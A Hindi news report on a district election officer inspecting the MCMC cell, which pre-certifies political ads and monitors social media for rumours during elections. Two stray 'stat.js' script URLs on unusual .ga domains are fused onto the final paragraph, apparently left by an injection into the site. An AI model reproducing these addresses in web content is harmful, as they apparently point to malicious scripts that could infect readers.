अब सोशल नेटवर्किंग साइट्स पर अफ्वाह् फैलाने वाले लोग हो जाए सावधान, प्रशासन द्वारा हो सकती है सख्त कार्यवाही। शनिवार को जिला निर्वाचन पदाधिकारी सह डीएम डॉ चंद्रशेखर सिंह ने सूचना भवन में कार्यरत एमसीएमसी कोषांग का जायज़ा लिया। दरअसल, जिला निर्वाचन पदाधिकारी सह डीएम डॉ चंद्रशेखर सिंह ने कहा, “सोशल मीडिया व केबल पर प्रसारित राजनीतिक विज्ञापन का पूर्व प्रमाणीकरण इस कोषांग को करना है।

 

 

इस कोषांग के माध्यम से सोशल मीडिया और पेड न्यूज़ पर नजर रखी जा रही है। इसके लिए एमसीएमसी कोषांग में अलग से टीवी और कंप्यूटर की सुविधा दी गयी है, ताकि सोशल मीडिया पर नजर रखी जा सके।”डीएम ने आगे कहा कि शांतिपूर्ण व स्वच्छ निर्वाचन में मीडिया का अहम रोल है। विशेष तौर पर मतदाता जागरूकता कार्यक्रमों में मीडिया की सहभागिता प्रशंसनीय रही है। सोशल मीडिया पर अफवाह फैलाने वाले तत्वों तथा माहौल बिगाड़ने वाले तत्वो को बक्शा नहीं जायेगा। उनके विरुद्ध सख्त कार्रवाई की जायेगी।

 

 

कोषांग के नोडल पदाधिकारी ने बताया कि इलेक्ट्रॉनिक चैनलों, सोशल मीडिया व केबल चैनल्स पर राजनीतिक विज्ञापनों का पूर्व प्रमाणीकरण कराना आवश्यक तो है ही, साथ ही वॉइस मैसेज बल्क एसएमएस व ऑडियो वीडियो विजुअल पर प्रसारित सामग्री का भी पूर्ण प्रमाणीकरण एमसीएमसी कोषांग से ही होगा। चुनाव के दौरान व्हाट्सएप ग्रुप, फेसबुक पेज, यूट्यूब चैनल, पोर्टल सबों पर नजर रखी जा रही है। बता दें, मौके पर सहायक समाहर्ता खुशबू गुप्ता, कोषांग के नोडल पदाधिकारी सह डीपीआरओ कमल सिंह मौजूद थे।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.